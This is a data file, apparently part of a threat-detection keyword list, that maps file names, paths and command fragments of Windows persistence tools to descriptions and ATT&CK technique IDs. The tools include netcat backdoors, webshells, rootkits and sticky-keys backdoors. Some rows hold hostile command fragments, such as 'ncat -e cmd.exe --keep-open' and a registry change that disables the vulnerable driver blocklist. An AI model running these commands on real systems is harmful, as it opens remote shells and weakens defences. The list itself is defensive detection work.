417*\nc64.exe -i *.{0,1000}\\nc64\.exe\s\-i\s.{0,1000}greyware_tool_keywordncbackdoor with netcat - used by the Ransomware group DispossessorT1547.001 - T1059.003 - T1105TA0003 - TA0005 - TA0011N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A16745
418*\nc64.exe -i*.{0,1000}\\nc64\.exe\s\-i.{0,1000}greyware_tool_keywordncbackdoor with netcat - used by the Ransomware group DispossessorT1547.001 - T1059.003 - T1105TA0003 - TA0005 - TA0011N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A16746
419*\nc64.exe -lvp *.{0,1000}\\nc64\.exe\s\-lvp\s.{0,1000}greyware_tool_keywordncbackdoor with netcat - used by the Ransomware group DispossessorT1547.001 - T1059.003 - T1105TA0003 - TA0005 - TA0011N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A16747
420*\nc64.exe -zv *.{0,1000}\\nc64\.exe\s\-zv\s.{0,1000}greyware_tool_keywordncbackdoor with netcat - used by the Ransomware group DispossessorT1547.001 - T1059.003 - T1105TA0003 - TA0005 - TA0011N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A16748
421*\nc64.exe" -i *.{0,1000}\\nc64\.exe\"\s\-i\s.{0,1000}greyware_tool_keywordncbackdoor with netcat - used by the Ransomware group DispossessorT1547.001 - T1059.003 - T1105TA0003 - TA0005 - TA0011N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A16749
422*\nc64.exe" -lvp *.{0,1000}\\nc64\.exe\"\s\-lvp\s.{0,1000}greyware_tool_keywordncbackdoor with netcat - used by the Ransomware group DispossessorT1547.001 - T1059.003 - T1105TA0003 - TA0005 - TA0011N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A16750
423*\nc64.exe" -zv *.{0,1000}\\nc64\.exe\"\s\-zv\s.{0,1000}greyware_tool_keywordncbackdoor with netcat - used by the Ransomware group DispossessorT1547.001 - T1059.003 - T1105TA0003 - TA0005 - TA0011N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A16751
424*\ncat* -e cmd.exe --keep-open*.{0,1000}\\ncat.{0,1000}\s\-e\scmd\.exe\s\-\-keep\-open.{0,1000}greyware_tool_keywordncbackdoor with netcat - used by the Ransomware group DispossessorT1547.001 - T1059.003 - T1105TA0003 - TA0005 - TA0011N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A16752
425*\netshlep.cpp*.{0,1000}\\netshlep\.cpp.{0,1000}offensive_tool_keywordOffensive-Netsh-HelperMaintain Windows Persistence with an evil Netshell Helper DLLT1174 - T1055.011 - T1546.013 - T1574.002 - T1105TA0003 N/AN/APersistencehttps://github.com/rtcrowley/Offensive-Netsh-Helper10N/AN/A911252018-07-28T02:12:09Z2018-07-25T22:49:20Z16829
426*\oem\Desktop\backdoor*.{0,1000}\\oem\\Desktop\\backdoor.{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor10N/AN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z17027
427*\Offensive-Netsh-Helper\*.{0,1000}\\Offensive\-Netsh\-Helper\\.{0,1000}offensive_tool_keywordOffensive-Netsh-HelperMaintain Windows Persistence with an evil Netshell Helper DLLT1174 - T1055.011 - T1546.013 - T1574.002 - T1105TA0003 N/AN/APersistencehttps://github.com/rtcrowley/Offensive-Netsh-Helper10N/AN/A911252018-07-28T02:12:09Z2018-07-25T22:49:20Z17032
428*\Offensive-Netsh-Helper-master*.{0,1000}\\Offensive\-Netsh\-Helper\-master.{0,1000}offensive_tool_keywordOffensive-Netsh-HelperMaintain Windows Persistence with an evil Netshell Helper DLLT1174 - T1055.011 - T1546.013 - T1574.002 - T1105TA0003 N/AN/APersistencehttps://github.com/rtcrowley/Offensive-Netsh-Helper10N/AN/A911252018-07-28T02:12:09Z2018-07-25T22:49:20Z17033
429*\OfficePersistence.ps1*.{0,1000}\\OfficePersistence\.ps1.{0,1000}offensive_tool_keywordOffice-PersistenceUse powershell to test Office-based persistence methodsT1059.001 - T1137 - T1116TA0003 N/AN/APersistencehttps://github.com/3gstudent/Office-Persistence10N/AN/A9176242021-04-17T01:39:13Z2017-07-14T10:03:35Z17035
430*\persistence\elevated\rid_hijack*.{0,1000}\\persistence\\elevated\\rid_hijack.{0,1000}offensive_tool_keywordRID-HijackingWindows RID Hijacking persistence techniqueT1174TA0003N/AN/APersistencehttps://github.com/r4wd3r/RID-Hijacking10N/AN/A92174432024-11-20T01:43:01Z2018-07-14T18:48:51Z17212
431*\persistence_demos-master*.{0,1000}\\persistence_demos\-master.{0,1000}offensive_tool_keywordpersistence_demosDemos of various (also non standard) persistence methods used by malwareT1546 - T1547 - T1133 - T1053 - T1037TA0003 N/AN/APersistencehttps://github.com/hasherezade/persistence_demos10N/AN/A73221472023-03-05T17:01:14Z2017-05-16T09:08:47Z17213
432*\php-backdoor.php*.{0,1000}\\php\-backdoor\.php.{0,1000}offensive_tool_keywordwebshellA collection of webshellT1505.003 - T1100 - T1190 - T1505.004TA0003 - TA0011 N/AN/APersistencehttps://github.com/Peaky-XD/webshell10N/AN/A10N/A17244
433*\pipe\$77control*.{0,1000}\\pipe\\\$77control.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#namedpipeN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z17265
434*\PoshADCS-master*.{0,1000}\\PoshADCS\-master.{0,1000}offensive_tool_keywordPoshADCSattack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)T1213.003 - T1213 - T1098.003 - T1098 - T1484.001TA0002 - TA0003 - TA0040N/AN/APersistencehttps://github.com/cfalta/PoshADCS10N/AN/A72186172021-07-07T16:47:07Z2019-10-15T15:54:03Z17339
435*\PowerLurk.ps1*.{0,1000}\\PowerLurk\.ps1.{0,1000}offensive_tool_keywordPowerlurkPowerLurk is a PowerShell toolset for building malicious WMI Event SubsriptionsT1084 - T1059.001 - T1546.003 - T1053.005TA0003 - TA0005 - TA0002 - TA0006N/AN/APersistencehttps://github.com/Sw4mpf0x/PowerLurk10N/AN/A104384722016-07-25T22:19:22Z2016-07-13T20:07:25Z17371
436*\PowerLurk-main*.{0,1000}\\PowerLurk\-main.{0,1000}offensive_tool_keywordPowerlurkPowerLurk is a PowerShell toolset for building malicious WMI Event SubsriptionsT1084 - T1059.001 - T1546.003 - T1053.005TA0003 - TA0005 - TA0002 - TA0006N/AN/APersistencehttps://github.com/Sw4mpf0x/PowerLurk10N/AN/A104384722016-07-25T22:19:22Z2016-07-13T20:07:25Z17372
437*\Process Hacker 2\*.{0,1000}\\Process\sHacker\s2\\.{0,1000}greyware_tool_keywordprocesshackerInteractions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services and process injectionT1055.001 - T1055.012 - T1003.001 - T1056.005TA0005 - TA0003 - TA0040 - TA0006 - TA0009N/AN/APersistencehttps://processhacker.sourceforge.io/10N/AN/A710N/AN/AN/AN/A17483
438*\PSprofile.exe*.{0,1000}\\PSprofile\.exe.{0,1000}offensive_tool_keywordPspersistDropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001TA0003N/AN/APersistencehttps://github.com/TheD1rkMtr/Pspersist10N/AN/A10185242023-08-02T02:27:29Z2023-02-01T17:21:38Z17620
439*\r77config.c*.{0,1000}\\r77config\.c.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10N/AN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z17721
440*\r77-rootkit\*.{0,1000}\\r77\-rootkit\\.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10N/AN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z17722
441*\r77-x64.dll*.{0,1000}\\r77\-x64\.dll.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10N/AN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z17723
442*\r77-x86.dll*.{0,1000}\\r77\-x86\.dll.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10N/AN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z17724
443*\RedPersist.exe*.{0,1000}\\RedPersist\.exe.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z17864
444*\RedPersist.pdb*.{0,1000}\\RedPersist\.pdb.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z17865
445*\RedPersist.sln*.{0,1000}\\RedPersist\.sln.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z17866
446*\RedPersist-main\*.{0,1000}\\RedPersist\-main\\.{0,1000}offensive_tool_keywordRedPersistRedPersist is a Windows Persistence tool written in C#T1053 - T1547 - T1112TA0004 - TA0005 - TA0040N/AN/APersistencehttps://github.com/mertdas/RedPersist10N/AN/A103215332024-03-10T15:40:05Z2023-08-13T22:10:46Z17867
447*\rid_hijack.py*.{0,1000}\\rid_hijack\.py.{0,1000}offensive_tool_keywordRID-HijackingWindows RID Hijacking persistence techniqueT1174TA0003N/AN/APersistencehttps://github.com/r4wd3r/RID-Hijacking10N/AN/A92174432024-11-20T01:43:01Z2018-07-14T18:48:51Z18065
448*\rid_hijack.rb*.{0,1000}\\rid_hijack\.rb.{0,1000}offensive_tool_keywordRID-HijackingWindows RID Hijacking persistence techniqueT1174TA0003N/AN/APersistencehttps://github.com/r4wd3r/RID-Hijacking10N/AN/A92174432024-11-20T01:43:01Z2018-07-14T18:48:51Z18067
449*\RID-Hijacking\*.{0,1000}\\RID\-Hijacking\\.{0,1000}offensive_tool_keywordRID-HijackingWindows RID Hijacking persistence techniqueT1174TA0003N/AN/APersistencehttps://github.com/r4wd3r/RID-Hijacking10N/AN/A92174432024-11-20T01:43:01Z2018-07-14T18:48:51Z18068
450*\RID-Hijacking-master*.{0,1000}\\RID\-Hijacking\-master.{0,1000}offensive_tool_keywordRID-HijackingWindows RID Hijacking persistence techniqueT1174TA0003N/AN/APersistencehttps://github.com/r4wd3r/RID-Hijacking10N/AN/A92174432024-11-20T01:43:01Z2018-07-14T18:48:51Z18069
451*\Rootkit.cpp*.{0,1000}\\Rootkit\.cpp.{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit10N/AN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z18100
452*\ruler.exe*.{0,1000}\\ruler\.exe.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler10N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z18200
453*\Safe_mode_AnyDesk.txt*.{0,1000}\\Safe_mode_AnyDesk\.txt.{0,1000}offensive_tool_keywordDispossessornotes used to install anydesk by the Dispossessor groupT1486 - T1490 - T1059 - T1213 - T1078TA0040 - TA0043 - TA0001 - TA0009N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A18250
454*\Sandman.exe*.{0,1000}\\Sandman\.exe.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman10N/AN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z18276
455*\sandman_server.py*.{0,1000}\\sandman_server\.py.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman10N/AN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z18277
456*\SandmanBackdoorTimeProvider.dll*.{0,1000}\\SandmanBackdoorTimeProvider\.dll.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman10N/AN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z18278
457*\Sandman-master.zip*.{0,1000}\\Sandman\-master\.zip.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman10N/AN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z18279
458*\SchTask.sln*.{0,1000}\\SchTask\.sln.{0,1000}offensive_tool_keywordSchTask_0x727create hidden scheduled tasksT1053TA0005 - TA0003N/AN/APersistencehttps://github.com/0x727/SchTask_0x72710N/AN/A1065321122021-09-01T01:34:51Z2021-08-30T03:29:34Z18290
459*\SchTask.zip*.{0,1000}\\SchTask\.zip.{0,1000}offensive_tool_keywordSchTask_0x727create hidden scheduled tasksT1053TA0005 - TA0003N/AN/APersistencehttps://github.com/0x727/SchTask_0x72710N/AN/A1065321122021-09-01T01:34:51Z2021-08-30T03:29:34Z18291
460*\SchTask_0x727\*.{0,1000}\\SchTask_0x727\\.{0,1000}offensive_tool_keywordSchTask_0x727create hidden scheduled tasksT1053TA0005 - TA0003N/AN/APersistencehttps://github.com/0x727/SchTask_0x72710N/AN/A1065321122021-09-01T01:34:51Z2021-08-30T03:29:34Z18292
461*\SchTaskBackdoor.*.{0,1000}\\SchTaskBackdoor\..{0,1000}offensive_tool_keywordSharPersistSharPersist Windows persistence toolkit written in C#.T1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/fireeye/SharPersist10N/AN/A101014602572023-08-11T00:52:09Z2019-06-21T13:32:14Z18293
462*\sdb-explorer.exe*.{0,1000}\\sdb\-explorer\.exe.{0,1000}offensive_tool_keywordShimDBShim database persistence (Fin7 TTP)T1546.011TA0003N/AN/APersistencehttps://github.com/jackson5sec/ShimDB10N/AN/A9137102020-02-25T09:41:53Z2018-06-21T00:38:10Z18324
463*\sdb-explorer.sln*.{0,1000}\\sdb\-explorer\.sln.{0,1000}offensive_tool_keywordShimDBShim database persistence (Fin7 TTP)T1546.011TA0003N/AN/APersistencehttps://github.com/jackson5sec/ShimDB10N/AN/A9137102020-02-25T09:41:53Z2018-06-21T00:38:10Z18325
464*\Seatbelt.sln*.{0,1000}\\Seatbelt\.sln.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/AN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z18338
465*\Seatbelt\Commands\*.{0,1000}\\Seatbelt\\Commands\\.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/AN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z18340
466*\Seatbelt\Program.cs*.{0,1000}\\Seatbelt\\Program\.cs.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/AN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z18341
467*\Seatbelt\Seatbelt.cs*.{0,1000}\\Seatbelt\\Seatbelt\.cs.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/AN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z18342
468*\SharPersist\*.{0,1000}\\SharPersist\\.{0,1000}offensive_tool_keywordSharPersistSharPersist Windows persistence toolkit written in C#.T1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/fireeye/SharPersist10N/AN/A101014602572023-08-11T00:52:09Z2019-06-21T13:32:14Z18535
469*\SharpPersistSD.cs*.{0,1000}\\SharpPersistSD\.cs.{0,1000}offensive_tool_keywordSharpPersistSDA Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machinesT1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/cybersectroll/SharpPersistSD10N/AN/A10187122024-05-15T14:55:14Z2024-05-13T15:11:12Z18637
470*\SharpPersistSD.dll*.{0,1000}\\SharpPersistSD\.dll.{0,1000}offensive_tool_keywordSharpPersistSDA Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machinesT1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/cybersectroll/SharpPersistSD10N/AN/A10187122024-05-15T14:55:14Z2024-05-13T15:11:12Z18638
471*\SharpPersistSD.sln*.{0,1000}\\SharpPersistSD\.sln.{0,1000}offensive_tool_keywordSharpPersistSDA Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machinesT1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/cybersectroll/SharpPersistSD10N/AN/A10187122024-05-15T14:55:14Z2024-05-13T15:11:12Z18639
472*\SharpSC.exe*.{0,1000}\\SharpSC\.exe.{0,1000}offensive_tool_keywordSharpSC.NET assembly to interact with services. (included in powershell empire)T1543.003TA0003N/AN/APersistencehttps://github.com/djhohnstein/SharpSC10N/AN/A814062019-09-27T23:04:24Z2019-09-24T21:05:38Z18660
473*\SharpSC-main*.{0,1000}\\SharpSC\-main.{0,1000}offensive_tool_keywordSharpSC.NET assembly to interact with services. (included in powershell empire)T1543.003TA0003N/AN/APersistencehttps://github.com/djhohnstein/SharpSC10N/AN/A814062019-09-27T23:04:24Z2019-09-24T21:05:38Z18666
474*\ShimDB\sdb-explorer*.{0,1000}\\ShimDB\\sdb\-explorer.{0,1000}offensive_tool_keywordShimDBShim database persistence (Fin7 TTP)T1546.011TA0003N/AN/APersistencehttps://github.com/jackson5sec/ShimDB10N/AN/A9137102020-02-25T09:41:53Z2018-06-21T00:38:10Z18801
475*\simple-backdoor.php*.{0,1000}\\simple\-backdoor\.php.{0,1000}offensive_tool_keywordwebshellA collection of webshellT1505.003 - T1100 - T1190 - T1505.004TA0003 - TA0011 N/AN/APersistencehttps://github.com/Peaky-XD/webshell10N/AN/A10N/A18832
476*\Start Menu\Programs\Startup\svchost.exe*.{0,1000}\\Start\sMenu\\Programs\\Startup\\svchost\.exe.{0,1000}offensive_tool_keyword_known executable in strange location - used by multiple malwaresT1037 - T1059 - T1547TA0003 - TA0005?N/AN/APersistenceN/A10N/AN/A1010N/AN/AN/AN/A19123
477*\stickykey.ps1*.{0,1000}\\stickykey\.ps1.{0,1000}offensive_tool_keywordPersistence-Accessibility-Featuresautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/Ignitetechnologies/Persistence-Accessibility-Features10N/AN/A9134122020-05-18T05:59:58Z2020-05-18T05:59:23Z19137
478*\Stickykeys.sh*.{0,1000}\\Stickykeys\.sh.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z19138
479*\Suborner.sln*.{0,1000}\\Suborner\.sln.{0,1000}offensive_tool_keywordSubornerThe Invisible Account Forger - A simple program to create a Windows account you will only know about T1098 - T1175 - T1033TA0007 - TA0008 - TA0003N/AN/APersistencehttps://github.com/r4wd3r/Suborner10N/AN/A95469582024-11-20T01:34:44Z2022-04-26T00:12:58Z19160
480*\sunder.exe*.{0,1000}\\sunder\.exe.{0,1000}offensive_tool_keywordSunderWindows rootkit designed to work with BYOVD exploitsT1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/ColeHouston/Sunder10N/AN/A102183202025-01-18T10:41:50Z2025-01-10T03:57:05Z19162
481*\SYSTEM\CurrentControlSet\Control\CI\Config\ -Name VulnerableDriverBlocklistEnable 0*.{0,1000}\\SYSTEM\\CurrentControlSet\\Control\\CI\\Config\\\s\-Name\sVulnerableDriverBlocklistEnable\s0.{0,1000}offensive_tool_keywordSunderWindows rootkit designed to work with BYOVD exploitsT1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/ColeHouston/Sunder10#registryN/A102183202025-01-18T10:41:50Z2025-01-10T03:57:05Z19197
482*\Temp\WinAuditDB.accdb*.{0,1000}\\Temp\\WinAuditDB\.accdb.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z19308
483*\TortoiseSVNHookScripts.cs*.{0,1000}\\TortoiseSVNHookScripts\.cs.{0,1000}offensive_tool_keywordSharPersistSharPersist Windows persistence toolkit written in C#.T1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/fireeye/SharPersist10N/AN/A101014602572023-08-11T00:52:09Z2019-06-21T13:32:14Z19407
484*\tsh_windows_amd64.exe*.{0,1000}\\tsh_windows_amd64\.exe.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go10N/AN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z19432
485*\tshd.go*.{0,1000}\\tshd\.go.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go10N/AN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z19433
486*\tshd_windows.go*.{0,1000}\\tshd_windows\.go.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go10N/AN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z19434
487*\tshd_windows_amd64.exe*.{0,1000}\\tshd_windows_amd64\.exe.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go10N/AN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z19435
488*\UnstoppableService.csproj*.{0,1000}\\UnstoppableService\.csproj.{0,1000}offensive_tool_keywordUnstoppableServicea Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interfaceT1543.003 - T1564.001 - T1490TA0003 - TA0005N/AN/APersistencehttps://github.com/malcomvetter/UnstoppableService10N/AN/A5166152019-01-19T22:38:18Z2018-08-07T22:11:22Z19526
489*\UnstoppableService.sln*.{0,1000}\\UnstoppableService\.sln.{0,1000}offensive_tool_keywordUnstoppableServicea Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interfaceT1543.003 - T1564.001 - T1490TA0003 - TA0005N/AN/APersistencehttps://github.com/malcomvetter/UnstoppableService10N/AN/A5166152019-01-19T22:38:18Z2018-08-07T22:11:22Z19527
490*\UnstoppableService-master*.{0,1000}\\UnstoppableService\-master.{0,1000}offensive_tool_keywordUnstoppableServicea Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interfaceT1543.003 - T1564.001 - T1490TA0003 - TA0005N/AN/APersistencehttps://github.com/malcomvetter/UnstoppableService10N/AN/A5166152019-01-19T22:38:18Z2018-08-07T22:11:22Z19528
491*\Use-Waitfor.exe*.{0,1000}\\Use\-Waitfor\.exe.{0,1000}offensive_tool_keywordWaitfor-PersistenceUse Waitfor.exe to maintain persistenceT1059 - T1117 - T1053.005 - T1546.013TA0002 - TA0003N/AN/APersistencehttps://github.com/3gstudent/Waitfor-Persistence10N/AN/A9154192021-04-17T01:41:42Z2017-06-07T09:33:13Z19576
492*\Waitfor-Persistence.ps1*.{0,1000}\\Waitfor\-Persistence\.ps1.{0,1000}offensive_tool_keywordWaitfor-PersistenceUse Waitfor.exe to maintain persistenceT1059 - T1117 - T1053.005 - T1546.013TA0002 - TA0003N/AN/APersistencehttps://github.com/3gstudent/Waitfor-Persistence10N/AN/A9154192021-04-17T01:41:42Z2017-06-07T09:33:13Z19646
493*\Waitfor-Persistence\*.{0,1000}\\Waitfor\-Persistence\\.{0,1000}offensive_tool_keywordWaitfor-PersistenceUse Waitfor.exe to maintain persistenceT1059 - T1117 - T1053.005 - T1546.013TA0002 - TA0003N/AN/APersistencehttps://github.com/3gstudent/Waitfor-Persistence10N/AN/A9154192021-04-17T01:41:42Z2017-06-07T09:33:13Z19647
494*\Waitfor-Persistence-master*.{0,1000}\\Waitfor\-Persistence\-master.{0,1000}offensive_tool_keywordWaitfor-PersistenceUse Waitfor.exe to maintain persistenceT1059 - T1117 - T1053.005 - T1546.013TA0002 - TA0003N/AN/APersistencehttps://github.com/3gstudent/Waitfor-Persistence10N/AN/A9154192021-04-17T01:41:42Z2017-06-07T09:33:13Z19648
495*\WinAudit.exe*.{0,1000}\\WinAudit\.exe.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z19715
